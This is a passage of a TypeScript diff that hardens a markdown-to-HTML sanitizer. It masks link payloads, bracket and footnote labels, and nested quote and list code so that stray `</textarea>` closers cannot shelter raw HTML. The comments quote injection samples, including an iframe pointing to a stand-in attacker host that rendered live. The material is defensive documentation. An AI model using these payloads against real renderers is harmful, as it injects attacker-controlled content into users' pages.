* A CAP-driven exit therefore returns `limit` — "blank through the cap" — while
|
|
2119
|
+
* a SHAPE-driven exit still returns -1. The two are distinguished by testing
|
|
2120
|
+
* `q >= limit` BEFORE the shape test at every exit; over-blanking a bounded
|
|
2121
|
+
* window is the fail-CLOSED direction, declining on a genuinely unparseable
|
|
2122
|
+
* shape is the deliberate one.
|
|
2123
|
+
*
|
|
2124
|
+
* AND THE CAP-DRIVEN EXIT MUST BLANK PAST THE CAP, not to it. Blanking exactly
|
|
2125
|
+
* `[from, limit)` still leaves the shelter live whenever the sheltered closer
|
|
2126
|
+
* sits BEYOND the cap — which is the ordinary case, since the filler is what
|
|
2127
|
+
* pushed the payload over it (measured: `[a](/x "<1100 y's></textarea>")` was
|
|
2128
|
+
* STILL a byte-identical no-op with a to-the-cap blank). So the caller widens a
|
|
2129
|
+
* capped payload to the end of its PARAGRAPH — CommonMark's own bound, since
|
|
2130
|
+
* neither a destination nor a title may contain a blank line. The cap therefore
|
|
2131
|
+
* only decides WHEN to stop parsing, never how little to blank, and a stray
|
|
2132
|
+
* `](` still cannot blank an unbounded tail: it fails on SHAPE and blanks
|
|
2133
|
+
* nothing.
|
|
2134
|
+
*
|
|
2135
|
+
* "FAILS ON SHAPE" HAS TO INCLUDE RUNNING OUT OF INPUT (round 22). It did not:
|
|
2136
|
+
* `limit` is `min(s.length, from + MAX)`, so a payload that simply reached the
|
|
2137
|
+
* END OF THE DOCUMENT hit the same `q >= limit` tests as a capped one and
|
|
2138
|
+
* returned `limit`, which the caller widened to `paragraphEnd`. `see [a](/x` at
|
|
2139
|
+
* end of input therefore blanked its paragraph tail (`see [a]( `) even though
|
|
2140
|
+
* nothing there is a link. Safe direction, but that is the COMMON shape while
|
|
2141
|
+
* STREAMING — the last token of a partial message is often a half-written link
|
|
2142
|
+
* — so an earlier opener was escaped mid-stream and unescaped when the link
|
|
2143
|
+
* completed, a visible flicker. The two are now distinguished by `overflow`:
|
|
2144
|
+
* `limit` only when input remains PAST the cap, -1 when the input is exhausted.
|
|
2145
|
+
* The cap path still blanks THROUGH (round 20's fix is untouched).
|
|
2146
|
+
*/
|
|
2147
|
+
const INLINE_LINK_PAYLOAD_MAX = 1024
|
|
2148
|
+
|
|
2149
|
+
const isInlineSpace = (ch: string): boolean =>
|
|
2150
|
+
ch === ' ' || ch === '\t' || ch === '\n' || ch === '\r' || ch === '\f' || ch === '\v'
|
|
2151
|
+
|
|
2152
|
+
/** Index of the payload's closing `)`, or the cap index when the payload runs
|
|
2153
|
+
* past `INLINE_LINK_PAYLOAD_MAX` (blank through the cap), or -1 when the shape
|
|
2154
|
+
* does not parse. `from` is the index just past the `](`. */
|
|
2155
|
+
function parseInlineLinkPayload(s: string, from: number): number {
|
|
2156
|
+
const limit = Math.min(s.length, from + INLINE_LINK_PAYLOAD_MAX)
|
|
2157
|
+
// What a `q >= limit` exit MEANS, which is not one thing (round 22):
|
|
2158
|
+
// - the CAP truncated a payload that still has input after it → `limit`,
|
|
2159
|
+
// "blank through the cap" (round 20; the caller widens to `paragraphEnd`);
|
|
2160
|
+
// - the INPUT RAN OUT → -1, a SHAPE decline. Nothing closed the payload and
|
|
2161
|
+
// nothing ever will in this document, so it is not a link to remark
|
|
2162
|
+
// either. This is the ordinary STREAMING tail (`see [a](/x` as the last
|
|
2163
|
+
// token), where returning `limit` widened the blank to the paragraph end
|
|
2164
|
+
// and escaped an earlier opener that unescaped again once the link
|
|
2165
|
+
// completed — a visible flicker.
|
|
2166
|
+
const overflow = limit < s.length ? limit : -1
|
|
2167
|
+
let q = from
|
|
2168
|
+
while (q < limit && isInlineSpace(s[q])) q++
|
|
2169
|
+
// DESTINATION — angle-bracketed, or a bare run with BALANCED parens.
|
|
2170
|
+
if (s[q] === '<') {
|
|
2171
|
+
q++
|
|
2172
|
+
while (q < limit && s[q] !== '>' && s[q] !== '\n') q += s[q] === '\\' ? 2 : 1
|
|
2173
|
+
if (q >= limit) return overflow
|
|
2174
|
+
if (s[q] !== '>') return -1
|
|
2175
|
+
q++
|
|
2176
|
+
} else {
|
|
2177
|
+
let depth = 0
|
|
2178
|
+
while (q < limit) {
|
|
2179
|
+
const ch = s[q]
|
|
2180
|
+
if (ch === '\\') {
|
|
2181
|
+
q += 2
|
|
2182
|
+
continue
|
|
2183
|
+
}
|
|
2184
|
+
if (isInlineSpace(ch)) break
|
|
2185
|
+
if (ch === '(') depth++
|
|
2186
|
+
else if (ch === ')') {
|
|
2187
|
+
if (depth === 0) break
|
|
2188
|
+
depth--
|
|
2189
|
+
}
|
|
2190
|
+
q++
|
|
2191
|
+
}
|
|
2192
|
+
if (q >= limit) return overflow
|
|
2193
|
+
if (depth !== 0) return -1
|
|
2194
|
+
}
|
|
2195
|
+
// TITLE — `"…"`, `'…'` or `(…)`, separated from the destination by space.
|
|
2196
|
+
const beforeGap = q
|
|
2197
|
+
while (q < limit && isInlineSpace(s[q])) q++
|
|
2198
|
+
const open = s[q]
|
|
2199
|
+
if (q > beforeGap && (open === '"' || open === "'" || open === '(')) {
|
|
2200
|
+
const close = open === '(' ? ')' : open
|
|
2201
|
+
let depth = 1
|
|
2202
|
+
q++
|
|
2203
|
+
while (q < limit) {
|
|
2204
|
+
const ch = s[q]
|
|
2205
|
+
if (ch === '\\') {
|
|
2206
|
+
q += 2
|
|
2207
|
+
continue
|
|
2208
|
+
}
|
|
2209
|
+
if (open === '(' && ch === '(') depth++
|
|
2210
|
+
else if (ch === close && --depth === 0) break
|
|
2211
|
+
q++
|
|
2212
|
+
}
|
|
2213
|
+
if (q >= limit) return overflow
|
|
2214
|
+
if (s[q] !== close) return -1
|
|
2215
|
+
q++
|
|
2216
|
+
while (q < limit && isInlineSpace(s[q])) q++
|
|
2217
|
+
}
|
|
2218
|
+
if (q >= limit) return overflow
|
|
2219
|
+
return s[q] === ')' ? q : -1
|
|
2220
|
+
}
|
|
2221
|
+
|
|
2222
|
+
/** Start index of the first BLANK line at or after `from`, i.e. the end of the
|
|
2223
|
+
* paragraph `from` sits in — the widest span an inline construct may cover. */
|
|
2224
|
+
function paragraphEnd(s: string, from: number): number {
|
|
2225
|
+
let lineStart = s.indexOf('\n', from)
|
|
2226
|
+
while (lineStart !== -1) {
|
|
2227
|
+
lineStart += 1
|
|
2228
|
+
const next = s.indexOf('\n', lineStart)
|
|
2229
|
+
const line = s.slice(lineStart, next === -1 ? s.length : next)
|
|
2230
|
+
if (isBlankLine(line)) return lineStart
|
|
2231
|
+
if (next === -1) break
|
|
2232
|
+
lineStart = next
|
|
2233
|
+
}
|
|
2234
|
+
return s.length
|
|
2235
|
+
}
|
|
2236
|
+
|
|
2237
|
+
function blankInlineLinkPayloads(masked: string, source: string): string {
|
|
2238
|
+
const ranges: Array<[number, number]> = []
|
|
2239
|
+
let i = source.indexOf('](')
|
|
2240
|
+
while (i !== -1) {
|
|
2241
|
+
const from = i + 2
|
|
2242
|
+
const cap = Math.min(source.length, from + INLINE_LINK_PAYLOAD_MAX)
|
|
2243
|
+
const close = parseInlineLinkPayload(source, from)
|
|
2244
|
+
if (close < 0) {
|
|
2245
|
+
i = source.indexOf('](', i + 1)
|
|
2246
|
+
continue
|
|
2247
|
+
}
|
|
2248
|
+
// A CAPPED payload (`close === cap`) has an unknown end, so blank to the end
|
|
2249
|
+
// of the paragraph — see the docblock. A parsed one blanks exactly.
|
|
2250
|
+
const end = close >= cap ? paragraphEnd(source, from) : close
|
|
2251
|
+
if (end > from) ranges.push([from, end])
|
|
2252
|
+
// Ascending and non-overlapping: resume past the range just blanked.
|
|
2253
|
+
i = source.indexOf('](', Math.max(end, from))
|
|
2254
|
+
}
|
|
2255
|
+
return blankRanges(masked, ranges)
|
|
2256
|
+
}
|
|
2257
|
+
|
|
2258
|
+
/** Sort + merge so overlapping/nested finds satisfy `blankRanges`' contract
|
|
2259
|
+
* (non-overlapping, ascending). Empty ranges are dropped. */
|
|
2260
|
+
function mergeRanges(ranges: Array<[number, number]>): Array<[number, number]> {
|
|
2261
|
+
ranges.sort((a, b) => a[0] - b[0])
|
|
2262
|
+
const out: Array<[number, number]> = []
|
|
2263
|
+
for (const [from, to] of ranges) {
|
|
2264
|
+
if (to <= from) continue
|
|
2265
|
+
const last = out[out.length - 1]
|
|
2266
|
+
if (last && from <= last[1]) {
|
|
2267
|
+
if (to > last[1]) last[1] = to
|
|
2268
|
+
} else out.push([from, to])
|
|
2269
|
+
}
|
|
2270
|
+
return out
|
|
2271
|
+
}
|
|
2272
|
+
|
|
2273
|
+
/**
|
|
2274
|
+
* Blank the BRACKET TEXT of every spelling remark consumes into an ATTRIBUTE or
|
|
2275
|
+
* an IDENTIFIER (round 20 — SECURITY, the other half of the shelter class
|
|
2276
|
+
* `blankInlineLinkPayloads` opened).
|
|
2277
|
+
*
|
|
2278
|
+
* Round 19 wrote the general rule — "every region CommonMark turns into an
|
|
2279
|
+
* ATTRIBUTE rather than document text is a shelter of the same kind" — and then
|
|
2280
|
+
* implemented only the `(…)` payload half of it, on a rationale ("never the
|
|
2281
|
+
* `[…]` link TEXT, which is inline-parsed and may hold real HTML") that is true
|
|
2282
|
+
* of an INLINE LINK and false of every other bracket spelling. All seven
|
|
2283
|
+
* reproduced live, in BOTH renderers, with `escapeUnknownHtmlTags` returning the
|
|
2284
|
+
* input BYTE-IDENTICAL and a live RAWTEXT element swallowing the prose:
|
|
2285
|
+
*
|
|
2286
|
+
*  → alt="</textarea>" (string attribute)
|
|
2287
|
+
* ![</textarea>][r] → alt="…" (reference image)
|
|
2288
|
+
* [a][</textarea>] → label → identifier, never rendered
|
|
2289
|
+
* [</textarea>][] → collapsed reference, identifier again
|
|
2290
|
+
* See[^</textarea>] → href="#user-content-fn-%3C/textarea%3E"
|
|
2291
|
+
* >  · -  (container-nested)
|
|
2292
|
+
*
|
|
2293
|
+
* …plus the escalation: `<iframe src="https://evil.example/x" width="600">` in
|
|
2294
|
+
* prose above `` yielded a LIVE iframe retaining `src`, `width`
|
|
2295
|
+
* and `height`.
|
|
2296
|
+
*
|
|
2297
|
+
* WHAT IS CLAIMED, AND WHAT IS DELIBERATELY NOT:
|
|
2298
|
+
*
|
|
2299
|
+
* - a `[…]` whose `[` is immediately preceded by `!` — an image's alt is a
|
|
2300
|
+
* STRING attribute in every image spelling (inline, reference, collapsed,
|
|
2301
|
+
* shortcut), so the bracket text never reaches the document as HTML;
|
|
2302
|
+
* - the SECOND `[…]` of a `][` adjacency — a FULL reference's label, which
|
|
2303
|
+
* remark resolves to a definition and never renders;
|
|
2304
|
+
* - the FIRST `[…]` of a `][]` adjacency — a COLLAPSED reference, whose
|
|
2305
|
+
* bracket text IS the identifier. (remark also inline-parses it for display,
|
|
2306
|
+
* so unlike an alt this one is not purely an attribute; blanking it is the
|
|
2307
|
+
* fail-CLOSED direction and the reviewer-confirmed shelter, not a claim that
|
|
2308
|
+
* the text is unrendered.)
|
|
2309
|
+
* - a footnote LABEL, `[^…]`, in BOTH the reference and the definition —
|
|
2310
|
+
* remark percent-encodes it into `href`/`id`. Only the LABEL: round 19 was
|
|
2311
|
+
* right that a footnote definition's BODY is BLOCK-parsed and may hold real
|
|
2312
|
+
* HTML, which is why `blankLinkDefinitions` refuses the whole line.
|
|
2313
|
+
* - NOT the `[…]` of an inline `[text](…)` link, and NOT a bare SHORTCUT
|
|
2314
|
+
* reference `[label]`: in both, remark emits the bracket text as inline
|
|
2315
|
+
* HTML, so a `</textarea>` there IS a real closer and must stay visible.
|
|
2316
|
+
* (Verified: with a live opener above it, that closer pairs.)
|
|
2317
|
+
*
|
|
2318
|
+
* The reference spellings are NOT reachable from the `](`-anchored scan in
|
|
2319
|
+
* `blankInlineLinkPayloads` — there is no `](` in `![x][r]` or `[a][r]` at all —
|
|
2320
|
+
* so this pass carries its own anchors.
|
|
2321
|
+
*
|
|
2322
|
+
* CONTAINER-AGNOSTIC BY CONSTRUCTION, like `blankInlineLinkPayloads`,
|
|
2323
|
+
* `blankLinkDefinitions` and `blankComments`: a single left-to-right bracket
|
|
2324
|
+
* walk with no column or prefix anchoring, so a blockquote run or list marker is
|
|
2325
|
+
* ordinary text ahead of it and ONE top-level call covers every nesting.
|
|
2326
|
+
*
|
|
2327
|
+
* FAIL DIRECTION: brackets that do not resolve to a link/image at all (ordinary
|
|
2328
|
+
* prose `see [1][2]`) are still blanked. Every such over-detection only hides
|
|
2329
|
+
* closers, i.e. escapes MORE openers. A backslash escape is consumed as a pair,
|
|
2330
|
+
* so `\[` does not open a group; `\!` still leaves the following `[` looking
|
|
2331
|
+
* image-like, which over-blanks in the same safe direction.
|
|
2332
|
+
*/
|
|
2333
|
+
function blankBracketLabels(
|
|
2334
|
+
masked: string,
|
|
2335
|
+
source: string,
|
|
2336
|
+
{ footnoteLabels = true }: { footnoteLabels?: boolean } = {},
|
|
2337
|
+
): string {
|
|
2338
|
+
if (source.indexOf('[') === -1) return masked
|
|
2339
|
+
const ranges: Array<[number, number]> = []
|
|
2340
|
+
/** Open `[` positions, innermost last. */
|
|
2341
|
+
const open: number[] = []
|
|
2342
|
+
/**
|
|
2343
|
+
* The most recently CLOSED group AT EACH NESTING DEPTH, for the `][` / `][]`
|
|
2344
|
+
* adjacencies. Round 23: this used to be a SINGLE `prev`, which any NESTED
|
|
2345
|
+
* group clobbered — so in `[txt][[^f]]` the outer second group (a full
|
|
2346
|
+
* reference's LABEL) was compared against the INNER `[^f]` instead of against
|
|
2347
|
+
* `[txt]`, the adjacency failed and the label was never blanked. That spelling
|
|
2348
|
+
* was a live fail-open through `blankUnreferencedFootnotes`' phantom count.
|
|
2349
|
+
* Depth-keyed, siblings are compared with siblings.
|
|
2350
|
+
*/
|
|
2351
|
+
const prevByDepth: Array<{ open: number; close: number } | null> = []
|
|
2352
|
+
for (let i = 0; i < source.length; i++) {
|
|
2353
|
+
const ch = source[i]
|
|
2354
|
+
if (ch === '\\') {
|
|
2355
|
+
i++
|
|
2356
|
+
continue
|
|
2357
|
+
}
|
|
2358
|
+
if (ch === '[') {
|
|
2359
|
+
open.push(i)
|
|
2360
|
+
// Whatever closed at this depth before belongs OUTSIDE the group just
|
|
2361
|
+
// opened, so it cannot be adjacent to anything inside it.
|
|
2362
|
+
prevByDepth[open.length] = null
|
|
2363
|
+
continue
|
|
2364
|
+
}
|
|
2365
|
+
if (ch !== ']') continue
|
|
2366
|
+
const from = open.pop()
|
|
2367
|
+
if (from === undefined) {
|
|
2368
|
+
prevByDepth[0] = null
|
|
2369
|
+
continue
|
|
2370
|
+
}
|
|
2371
|
+
const prev = prevByDepth[open.length] ?? null
|
|
2372
|
+
// IMAGE alt — `![…]`, every image spelling.
|
|
2373
|
+
if (from > 0 && source[from - 1] === '!') ranges.push([from + 1, i])
|
|
2374
|
+
// FOOTNOTE label — `[^…]`, reference and definition alike. Suppressed for
|
|
2375
|
+
// the reference-counting copy only (`footnoteReferenceMask`), where blanking
|
|
2376
|
+
// the labels would erase the very references being counted.
|
|
2377
|
+
if (footnoteLabels && source[from + 1] === '^') ranges.push([from + 2, i])
|
|
2378
|
+
// REFERENCE label — the second group of `[…][…]`, or, when that group is
|
|
2379
|
+
// EMPTY (`[…][]`), the first group, which is then the identifier.
|
|
2380
|
+
if (prev !== null && prev.close === from - 1) {
|
|
2381
|
+
if (i === from + 1) ranges.push([prev.open + 1, prev.close])
|
|
2382
|
+
else ranges.push([from + 1, i])
|
|
2383
|
+
}
|
|
2384
|
+
prevByDepth[open.length] = { open: from, close: i }
|
|
2385
|
+
}
|
|
2386
|
+
return blankRanges(masked, mergeRanges(ranges))
|
|
2387
|
+
}
|
|
2388
|
+
|
|
2389
|
+
/** `> ` / `>` container prefixes, including nested ones (`> > `). */
|
|
2390
|
+
const BLOCKQUOTE_PREFIX_RE = /^(?: {0,3}>[ \t]?)+/
|
|
2391
|
+
|
|
2392
|
+
/**
|
|
2393
|
+
* EXACT NO-OP GUARDS for the container cross-calls (round 19 — performance).
|
|
2394
|
+
*
|
|
2395
|
+
* `blankQuotedCode` and `blankListItemCode` each call the other and
|
|
2396
|
+
* `blankListItemCode` now calls itself, and each of those calls walks the run
|
|
2397
|
+
* and folds the WHOLE document through `blankRanges` per flush. Widening the
|
|
2398
|
+
* list gate to `top >= 1` made every ordinary `- ` item open a run, so a
|
|
2399
|
+
* list-dense document paid that constant on every line (measured 3.1x at
|
|
2400
|
+
* 989 KB before these guards).
|
|
2401
|
+
*
|
|
2402
|
+
* Both guards are EXACT, not heuristic: `blankQuotedCode` only ever opens a run
|
|
2403
|
+
* on a line `BLOCKQUOTE_PREFIX_RE` matches and `blankListItemCode` only ever
|
|
2404
|
+
* pushes a column for a line `LIST_MARKER_RE` matches, so a run containing no
|
|
2405
|
+
* such line produces no runs at all and returns `masked` byte-identical. Skipping
|
|
2406
|
+
* a provable identity cannot change coverage — do NOT weaken either predicate
|
|
2407
|
+
* into an approximation of "probably nothing here"; that is how the eight
|
|
2408
|
+
* fail-open instances above were born.
|
|
2409
|
+
*/
|
|
2410
|
+
const hasListMarker = (line: MaskLine): boolean => LIST_MARKER_RE.test(line.content)
|
|
2411
|
+
const hasQuotePrefix = (line: MaskLine): boolean => BLOCKQUOTE_PREFIX_RE.test(line.content)
|
|
2412
|
+
|
|
2413
|
+
/**
|
|
2414
|
+
* WINDOWED RUNS (round 19 — performance, and the same lesson as `blankRanges`
|
|
2415
|
+
* one level up).
|
|
2416
|
+
*
|
|
2417
|
+
* `blankRanges` is O(document): it rebuilds the whole string. The container
|
|
2418
|
+
* passes used to hand it the WHOLE document once per nested pass PER RUN, so a
|
|
2419
|
+
* document that is one long sequence of list/quote runs paid O(runs × document)
|
|
2420
|
+
* — a second quadratic, sitting directly above the one round 18 removed.
|
|
2421
|
+
* Widening the list gate to `top >= 1` tripled the run count and made it
|
|
2422
|
+
* visible: a 989 KB all-fenced-in-list-items document went 320 ms → 1006 ms.
|
|
2423
|
+
*
|
|
2424
|
+
* Runs are DISJOINT and ASCENDING, and every range any nested pass produces
|
|
2425
|
+
* lies inside its own run's span (fence ranges start at `line.start`, every
|
|
2426
|
+
* other pass at `line.contentStart`). So a run can be masked in ISOLATION, on a
|
|
2427
|
+
* window sliced out of the caller's baseline with all offsets rebased, and the
|
|
2428
|
+
* windows spliced back in ONE fold at the end. Same output, one document
|
|
2429
|
+
* rebuild per pass instead of one per run.
|
|
2430
|
+
*
|
|
2431
|
+
* Do not reintroduce a per-run fold; a container pass that reassigns the whole
|
|
2432
|
+
* `masked` inside its `flush` is the regression.
|
|
2433
|
+
*/
|
|
2434
|
+
function rebaseRun(run: MaskLine[], from: number): MaskLine[] {
|
|
2435
|
+
return run.map((line) => ({
|
|
2436
|
+
start: line.start - from,
|
|
2437
|
+
contentStart: line.contentStart - from,
|
|
2438
|
+
content: line.content,
|
|
2439
|
+
}))
|
|
2440
|
+
}
|
|
2441
|
+
|
|
2442
|
+
function spliceWindows(masked: string, edits: Array<[number, number, string]>): string {
|
|
2443
|
+
if (edits.length === 0) return masked
|
|
2444
|
+
const parts: string[] = []
|
|
2445
|
+
let cursor = 0
|
|
2446
|
+
for (const [from, to, text] of edits) {
|
|
2447
|
+
if (from > cursor) parts.push(masked.slice(cursor, from))
|
|
2448
|
+
parts.push(text)
|
|
2449
|
+
cursor = to
|
|
2450
|
+
}
|
|
2451
|
+
parts.push(masked.slice(cursor))
|
|
2452
|
+
return parts.join('')
|
|
2453
|
+
}
|
|
2454
|
+
|
|
2455
|
+
/** The window a run occupies: from the first line's START (fence ranges are
|
|
2456
|
+
* anchored there, before any container prefix) to the last line's END. */
|
|
2457
|
+
function runWindow(run: MaskLine[]): [number, number] {
|
|
2458
|
+
const last = run[run.length - 1]
|
|
2459
|
+
return [run[0].start, last.contentStart + last.content.length]
|
|
2460
|
+
}
|
|
2461
|
+
|
|
2462
|
+
/**
|
|
2463
|
+
* CONTAINER NESTING DEPTH GUARD — and it FAILS CLOSED (round 19).
|
|
2464
|
+
*
|
|
2465
|
+
* The round-17 termination note claimed the mutual recursion was "verified
|
|
2466
|
+
* empirically on `> - ` alternation nested 1/2/5/20/100/500/2000/8000 levels
|
|
2467
|
+
* deep … no throw, ≤4 ms, and the observed recursion depth CAPPED AT 4". THAT
|
|
2468
|
+
* CLAIM IS FALSE and was false when written: HEAD throws `RangeError: Maximum
|
|
2469
|
+
* call stack size exceeded` on that exact input from depth ~2000 up. The
|
|
2470
|
+
* recursion terminates (the measure argument is sound) but its DEPTH is bounded
|
|
2471
|
+
* only by input length, and V8's stack is not. A `RangeError` out of the
|
|
2472
|
+
* sanitizer is a rendering crash, i.e. a denial of service on a 24 KB message.
|
|
2473
|
+
*
|
|
2474
|
+
* Round 19's list self-recursion widened the trigger (a single line of `- `
|
|
2475
|
+
* markers overflows from depth ~4000, where HEAD survived because
|
|
2476
|
+
* `LIST_MARKER_RE` matches only the first marker), so the guard lands here.
|
|
2477
|
+
*
|
|
2478
|
+
* THE GUARD IS NOT A COVERAGE HOLE. At the limit the run is not skipped — it is
|
|
2479
|
+
* BLANKED WHOLE, which is the strictly more aggressive answer and exactly the
|
|
2480
|
+
* fail direction this module rounds towards everywhere else. A markdown document
|
|
2481
|
+
* nested 64 containers deep is a code sample rendered as escaped text, not a
|
|
2482
|
+
* shelter. Do NOT convert this into a `return` / `continue`: skipping is the
|
|
2483
|
+
* fail-OPEN direction and would be a new instance of the class.
|
|
2484
|
+
*/
|
|
2485
|
+
const CONTAINER_NEST_LIMIT = 64
|
|
2486
|
+
|
|
2487
|
+
/**
|
|
2488
|
+
* Blank code regions inside BLOCKQUOTES.
|
|
2489
|
+
*
|
|
2490
|
+
* `FENCE_RE` matches at column 0..3, so a fence inside a quote (```` > ```html ````)
|
|
2491
|
+
* is invisible to the top-level tracker — and a blockquoted code sample is an
|
|
2492
|
+
* utterly ordinary chat answer ("here's the markup:" followed by a quoted
|
|
2493
|
+
* fence). The closer inside it satisfied `hasLaterCloser` and the prose opener
|
|
2494
|
+
* above stayed live.
|
|
2495
|
+
*
|
|
2496
|
+
* CHOSEN APPROACH: strip the quote prefix off each run of quoted lines and run
|
|
2497
|
+
* a NESTED tracker (plus the indented-code rule) over the stripped content,
|
|
2498
|
+
* blanking only the code regions found. The blunter alternative — blank every
|
|
2499
|
+
* `^ {0,3}>` line — is also sound (it only over-blanks) but it would escape a
|
|
2500
|
+
* legitimately PAIRED `<textarea>…</textarea>` written inside a blockquote,
|
|
2501
|
+
* turning quoted HTML into visible `<…>` source. The nested scan costs
|
|
2502
|
+
* one extra line walk and keeps that shape rendering.
|
|
2503
|
+
*
|
|
2504
|
+
* ---------------------------------------------------------------------------
|
|
2505
|
+
* MUTUAL RECURSION — TERMINATION (round 17)
|
|
2506
|
+
* ---------------------------------------------------------------------------
|
|
2507
|
+
* `blankQuotedCode` and `blankListItemCode` now call EACH OTHER (the missing
|
|
2508
|
+
* quote→list direction was the seventh instance of the fail-open class). The
|
|
2509
|
+
* recursion terminates on the measure `M(run) = Σ line.content.length`:
|
|
2510
|
+
*
|
|
2511
|
+
* - `blankQuotedCode` only puts a line in a run when `BLOCKQUOTE_PREFIX_RE`
|
|
2512
|
+
* matches, and that pattern is `(?: {0,3}>[ \t]?)+` — at least one `>`, so
|
|
2513
|
+
* the stripped content is at least 1 char SHORTER. Blank lines never match
|
|
2514
|
+
* (they carry no `>`), so EVERY line in a quoted run strictly shortens.
|
|
2515
|
+
* - `blankListItemCode` only puts a line in a run when the content column
|
|
2516
|
+
* `top >= 1` (round 19 — was `>= 4`), and `charIndexAtColumn(content, top)`
|
|
2517
|
+
* with `top >= 1` returns an index `>= 1` (it can only return 0 when the
|
|
2518
|
+
* requested column is 0), so that line strictly shortens too. ROUND-19
|
|
2519
|
+
* RE-VERIFICATION: the same bound covers the new SELF-recursion — the run it
|
|
2520
|
+
* hands itself is cut at the same `top >= 1`, so `M` strictly decreases
|
|
2521
|
+
* across that call exactly as across the `blankQuotedCode` one. ROUND-18
|
|
2522
|
+
* RE-VERIFICATION: this also
|
|
2523
|
+
* covers the MARKER LINE, whose cut lands at `marker[0].length` (or
|
|
2524
|
+
* `markerEnd + 1` under the clamp) — both `>= 2` for every marker spelling,
|
|
2525
|
+
* so the bound `cut >= 1` is unchanged and the measure still strictly
|
|
2526
|
+
* decreases. The reorder moved WHICH lines join a run, not the shortening
|
|
2527
|
+
* property that makes the recursion finite. It also carries blank separators into an
|
|
2528
|
+
* ALREADY-OPEN run as `content: ''` (length 0 ≤ original), and a run is only
|
|
2529
|
+
* ever opened by a non-blank, strictly-shortened line.
|
|
2530
|
+
*
|
|
2531
|
+
* So each nested call is handed a run whose measure is strictly smaller than
|
|
2532
|
+
* the caller's, `M` is a non-negative integer, and the chain is finite.
|
|
2533
|
+
*
|
|
2534
|
+
* ---------------------------------------------------------------------------
|
|
2535
|
+
* FINITE IS NOT THE SAME AS SHALLOW (round 19 — the third false claim)
|
|
2536
|
+
* ---------------------------------------------------------------------------
|
|
2537
|
+
* Round 17 concluded here: "It is bounded by input length, so no depth guard is
|
|
2538
|
+
* added — there is no non-shortening case to guard against, and a speculative
|
|
2539
|
+
* bound would be a second, untested policy. Verified empirically on `> - `
|
|
2540
|
+
* alternation nested 1/2/5/20/100/500/2000/8000 levels deep (240 KB source):
|
|
2541
|
+
* length invariant held, no throw, ≤4 ms, and the observed recursion depth
|
|
2542
|
+
* CAPPED AT 4 regardless of nesting."
|
|
2543
|
+
*
|
|
2544
|
+
* THE EMPIRICAL PART OF THAT IS FALSE, and was false when written. Re-run on the
|
|
2545
|
+
* described input, HEAD raises `RangeError: Maximum call stack size exceeded`
|
|
2546
|
+
* from depth ~2000 up — a 24 KB message crashes the renderer. The depth cap of 4
|
|
2547
|
+
* held only for the shapes round 17 happened to try; `BLOCKQUOTE_PREFIX_RE`
|
|
2548
|
+
* consumes a `> > >` nest in one match, but an ALTERNATING `> - > - …` line
|
|
2549
|
+
* gives each pass exactly one level to strip and the chain is as deep as the
|
|
2550
|
+
* line is long. Round 19's list self-recursion widened it further (a plain `- `
|
|
2551
|
+
* run overflows from ~4000, where HEAD survived only because `LIST_MARKER_RE`
|
|
2552
|
+
* matches the first marker alone).
|
|
2553
|
+
*
|
|
2554
|
+
* Termination was never the property at risk — STACK DEPTH was, and "bounded by
|
|
2555
|
+
* input length" is precisely the bound that does not help. `CONTAINER_NEST_LIMIT`
|
|
2556
|
+
* now caps it, blanking an over-deep run WHOLE rather than recursing, which is
|
|
2557
|
+
* fail-CLOSED and therefore not a coverage hole. Pinned by
|
|
2558
|
+
* `masks arbitrarily deep container nesting without throwing` at depths up to
|
|
2559
|
+
* 40000 (469 KB, 11 ms, closer masked at every depth).
|
|
2560
|
+
*/
|
|
2561
|
+
function blankQuotedCode(masked: string, lines: MaskLine[], depth = 0): string {
|
|
2562
|
+
let run: MaskLine[] = []
|
|
2563
|
+
// One edit per run, spliced in a SINGLE fold at the end — see `spliceWindows`.
|
|
2564
|
+
const edits: Array<[number, number, string]> = []
|
|
2565
|
+
const flush = () => {
|
|
2566
|
+
if (run.length === 0) return
|
|
2567
|
+
const [from, to] = runWindow(run)
|
|
2568
|
+
const wl = rebaseRun(run, from)
|
|
2569
|
+
let win = masked.slice(from, to)
|
|
2570
|
+
// Depth limit: blank the run WHOLE rather than recurse — see
|
|
2571
|
+
// `CONTAINER_NEST_LIMIT`. Fail-closed, never a skip.
|
|
2572
|
+
if (depth >= CONTAINER_NEST_LIMIT) {
|
|
2573
|
+
edits.push([from, to, blankRanges(win, [[0, win.length]])])
|
|
2574
|
+
run = []
|
|
2575
|
+
return
|
|
2576
|
+
}
|
|
2577
|
+
// The nested FENCE scan needs the unmasked `run` content (the inline-code
|
|
2578
|
+
// pass would have blinded it), but the nested INDENTED scan needs the CURRENT
|
|
2579
|
+
// mask — see `blankIndentedCode`'s SCAN-SOURCE INVERSION.
|
|
2580
|
+
const afterFences = blankFencedRegions(win, wl)
|
|
2581
|
+
win = blankIndentedCode(afterFences, remapToMask(afterFences, wl))
|
|
2582
|
+
win = blankLinkDefinitions(win, wl)
|
|
2583
|
+
// …and the LIST-container pass, mirroring the call `blankListItemCode`
|
|
2584
|
+
// already makes in the other direction. Without it a fenced sample inside a
|
|
2585
|
+
// LIST ITEM inside a QUOTE was seen by NO pass: `FENCE_RE` caps fence indent
|
|
2586
|
+
// at 3 ABSOLUTE columns, so at a quote-relative content column >= 4
|
|
2587
|
+
// (`> 1. ` / `> - ` / `> -\t`) the fence is invisible to the nested
|
|
2588
|
+
// tracker, and `blankIndentedCode`'s list-aware threshold (`contentCol + 4`)
|
|
2589
|
+
// starts at 8 and never reaches it either. Reproduced live for textarea and
|
|
2590
|
+
// iframe, at both list spellings, the tab spelling and depth-2 quotes;
|
|
2591
|
+
// `escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL.
|
|
2592
|
+
if (wl.some(hasListMarker)) win = blankListItemCode(win, wl, depth + 1)
|
|
2593
|
+
edits.push([from, to, win])
|
|
2594
|
+
run = []
|
|
2595
|
+
}
|
|
2596
|
+
for (const line of lines) {
|
|
2597
|
+
const prefix = BLOCKQUOTE_PREFIX_RE.exec(line.content)
|
|
2598
|
+
if (!prefix) {
|
|
2599
|
+
flush()
|
|
2600
|
+
continue
|
|
2601
|
+
}
|
|
2602
|
+
run.push({
|
|
2603
|
+
start: line.start,
|
|
2604
|
+
contentStart: line.contentStart + prefix[0].length,
|
|
2605
|
+
content: line.content.slice(prefix[0].length),
|
|
2606
|
+
})
|
|
2607
|
+
}
|
|
2608
|
+
flush()
|
|
2609
|
+
return spliceWindows(masked, edits)
|
|
2610
|
+
}
|
|
2611
|
+
|
|
2612
|
+
/**
|
|
2613
|
+
